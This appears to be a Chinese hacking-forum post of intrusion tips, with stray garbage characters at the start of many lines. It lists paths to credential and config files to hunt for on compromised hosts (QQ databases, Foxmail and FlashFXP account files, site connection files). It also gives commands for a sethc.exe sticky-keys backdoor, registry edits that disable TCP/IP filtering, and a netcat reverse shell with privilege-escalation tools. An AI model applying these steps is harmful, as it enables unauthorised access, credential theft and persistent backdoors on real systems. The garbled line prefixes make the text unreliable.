! h" |: ^8 x3 d- ~; A* @3 ec:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
+ e, U" I9 y/ ?4 Ac:\Apache2\Apache2\bin\Apache.exe
2 Y2 O  h3 U2 jc:\Apache2\bin\Apache.exe
" \+ h% ~! S8 xc:\Apache2\php\license.txt
, h% y+ E3 _" x$ Y/ AC:\Program Files\Apache Group\Apache2\bin\Apache.exe
+ o9 i& G8 r3 {0 \2 }9 o% l/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
2 |- @' A, {+ d$ }/usr/tomcat6/bin/startup.sh
( {% |. Q% I7 P+ D" ic:\Program Files\QQ2007\qq.exe
c:\Program Files\Tencent\qq\User.db
2 ^: Q/ V4 u8 C6 X3 Mc:\Program Files\Tencent\qq\qq.exe
c:\Program Files\Tencent\qq\bin\qq.exe
/ p9 e* A' P0 kc:\Program Files\Tencent\qq2009\qq.exe
1 @. S" p2 H9 q' F7 Xc:\Program Files\Tencent\qq2008\qq.exe
8 E: N" d% V9 H* }6 ?c:\Program Files\Tencent\qq2010\bin\qq.exe
8 T$ o, W# x6 w* D6 jc:\Program Files\Tencent\qq\Users\All Users\Registry.db
  T& ], k( \: Z, L( r; o: T; `( [C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmal\Foxmail.exe
1 I, l7 a4 O9 F7 mC:\Program Files\Foxmal\accounts.cfg
/ [( W4 W6 e+ I+ F- dC:\Program Files\tencent\Foxmal\Foxmail.exe
C:\Program Files\tencent\Foxmal\accounts.cfg
; F! O9 z( @% ?; S+ o& R1 ^$ {0 EC:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
. k6 ~6 A# C7 k2 Zc:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
! ]9 V: A& u) E' S* MC:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
! i/ G9 R7 J! s8 R: N, xc:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
: v; r0 @, k8 d$ Dc:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
; Z  v3 Z/ K; sc:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe
0 H, L1 p# i7 i% K5 r- x/ q
3.网站相对路径:
; ?7 K1 {" B$ A  `: H7 X: D
/config.php
../../config.php
. F5 C, J6 T$ T: M0 K../config.php
../../../config.php
/config.inc.php
./config.inc.php
5 X% K$ e6 K  q' o  e' N" [../../config.inc.php
../config.inc.php
+ X# \) ?4 ]* _../../../config.inc.php
& |1 G% C. B, k/conn.php
3 a9 C. I, k6 \, v% W$ Y7 {) B./conn.php
../../conn.php
+ t: |7 e& M& u../conn.php
3 O9 x' ?2 _; ^! n, O+ g../../../conn.php
/ Y# N% P! a, G% U( }( T) A. M/conn.asp
./conn.asp
../../conn.asp
% l: _6 G0 W8 `, Y: t../conn.asp
( s8 M, I0 u- `$ o1 X../../../conn.asp
: M. j" l/ w/ h* [& [7 u/config.inc.php
2 B2 h% a/ I5 ^./config.inc.php
../../config.inc.php
. B' \  [! ~* Z1 @, R- U# B../config.inc.php
../../../config.inc.php
/config/config.php
" H8 ~4 [+ E6 S0 y( z2 n8 }6 a../../config/config.php
../config/config.php
2 [+ q; ]$ I; E+ T8 c" ^../../../config/config.php
% g$ {0 N9 l8 f% G. e- D* }/config/config.inc.php
./config/config.inc.php
7 h0 o5 H6 ^- n6 U: _- W../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
7 w! d" @( `* n  Q% ?$ Y- R/config/conn.php
: z! W8 N  e( u" p; y4 \./config/conn.php
, c; Q6 T% j5 M3 N, k: L  L3 q" b../../config/conn.php
../config/conn.php
../../../config/conn.php
: s3 r& n) ], y' h4 w' H' [/ @9 h/config/conn.asp
./config/conn.asp
../../config/conn.asp
9 z+ p2 ^& i% l../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
5 }1 ?; J/ y% B/ i2 @( f: C4 U/data/config.php
../../data/config.php
- N/ D& z% S! s2 ~; J0 S' ~# I../data/config.php
. G9 j- N6 S: I( j$ o% _../../../data/config.php
% A: e5 R5 q6 j1 ]/data/config.inc.php
./data/config.inc.php
/ v7 P8 l6 s# a, D! Q- f5 R../../data/config.inc.php
& j: a  H0 T7 V0 e3 j3 L+ H$ Z: c../data/config.inc.php
../../../data/config.inc.php
- S# n% E3 B! J/ z% z6 H/data/conn.php
1 Y2 G0 H+ T: ?0 c) w' |9 g1 `- Q$ O: G4 |./data/conn.php
5 [: g' C9 w5 m' s: @: r../../data/conn.php
../data/conn.php
2 E; e' `' w) w; ?5 o../../../data/conn.php
/data/conn.asp
./data/conn.asp
4 ]0 E* C6 b& f2 f../../data/conn.asp
, P3 @. k6 p, G8 B! T* ^../data/conn.asp
, w+ m: V$ H" _4 g( O& [../../../data/conn.asp
/data/config.inc.php
./data/config.inc.php
0 G9 {2 [) [1 q6 W( K% I8 S! y  o../../data/config.inc.php
  `/ S+ Y* Y( m# H* X$ P../data/config.inc.php
* w+ C; A! F! b8 {/ D7 M../../../data/config.inc.php
/include/config.php
../../include/config.php
! E& D5 [+ P; i; l' N../include/config.php
" F. y  [% G9 H../../../include/config.php
/include/config.inc.php
1 [; T! T, T7 M. r; G! G( J./include/config.inc.php
+ ^  o, x# M( t* A../../include/config.inc.php
5 X7 x# R. ?$ b../include/config.inc.php
. D4 D6 D: W4 l( ~* n../../../include/config.inc.php
/include/conn.php
2 Z" l) g5 X, l1 F+ Q" ^./include/conn.php
../../include/conn.php
../include/conn.php
7 z' f0 ]6 b6 u6 ]: ]$ P! H. i9 |../../../include/conn.php
0 v5 w. q( m9 W/include/conn.asp
./include/conn.asp
% i. A% l# Z" N7 a. y../../include/conn.asp
../include/conn.asp
; {5 U! {2 q6 ~5 ~2 H+ a7 {1 b+ P../../../include/conn.asp
/include/config.inc.php
/ u' Y6 u, l: q. Q3 }./include/config.inc.php
3 a: R' K" D- V( |  T% o3 J../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
+ s1 e$ ?8 m3 W9 z../../inc/config.php
" a1 y) }) u  n6 w; H../inc/config.php
/ W4 T2 N) g5 v/ `0 a: N../../../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
  a4 [. ~- Y( ~../../inc/config.inc.php
../inc/config.inc.php
../../../inc/config.inc.php
; i# P/ L  [4 e; a0 N: }/inc/conn.php
0 [2 C! A" D$ B, W" t/ Y* S./inc/conn.php
../../inc/conn.php
/ G! B5 o( U# V  p+ p../inc/conn.php
- `4 b; `$ S% H. X/ y" _4 k4 Y../../../inc/conn.php
: G, n# [8 v7 V9 D5 T: m/ z/inc/conn.asp
./inc/conn.asp
2 E9 Q7 ?6 k( G: o3 |../../inc/conn.asp
../inc/conn.asp
! Y2 n& e6 n- K, S! F../../../inc/conn.asp
; |* v: F/ g) }/inc/config.inc.php
./inc/config.inc.php
1 u9 `5 l/ r# ?7 I8 M3 w../../inc/config.inc.php
  h0 p# C. _6 N- ]../inc/config.inc.php
- n' W5 k5 }/ x2 Z0 T../../../inc/config.inc.php
/index.php
4 Y" @( C3 }% R# c( o2 ]7 l* \5 j9 Q/ j./index.php
../../index.php
  k. W- E0 a+ ~../index.php
8 C+ L" [1 t6 y6 |" U../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
! t) c1 j. V% g2 Q! V" m5 L7 O- ^../../../index.asp
1 N9 n% h( w: z& h3 i/ r. n替换SHIFT后门
' [: l* w' M: {7 |( m+ [　attrib c:\windows\system32\sethc.exe -h -r -s

　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

) X2 \# L& \! Y- ]% l" p1 d# Q　　del c:\windows\system32\sethc.exe

/ M- k6 _5 b3 H! W2 A　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
5 U5 G  f, _5 F- |: N
9 {  w( n# c, h　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

　　attrib c:\windows\system32\sethc.exe +h +r +s
! o- I0 W* I0 s) g
6 o8 n* \% ?/ B: L　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
& c* B; ~3 y1 }5 w1 h' H. X去除TCPIP筛选
' m$ H9 V4 ]" q5 V* x3 c1 iTCP/IP筛选在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
5 Y/ y5 A# Q6 H4 ?$ T5 n# `7 p; zHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

# }* ]" G: B) v# x分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- S! Z: k7 l# _/ t1 _regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 B8 q$ F! h, ], `9 i8 |% ]  E命令来导出注册表项

4 e- X7 {( u/ @& P然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000

$ ^, |4 C! q" j再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
% r" z: i$ A7 z3 }regedit -s D:\c.reg
1 f" W, z5 r0 X* h0 F: X导入注册表即可
0 E. S( W( G) f) O2 l
! Z' G( f' B- d; ?8 y; |6 J8 O8 qwebshell提权小技巧
# ~! e6 C3 h6 s' ccmd路径:
c:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell：
) a: `/ W' x! r  I5 K3 s% d" h( B"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不会成功。

8 K( H8 }) u3 Y/ T' W: z) ^而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
8 S  b  t1 ^9 |& ]命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2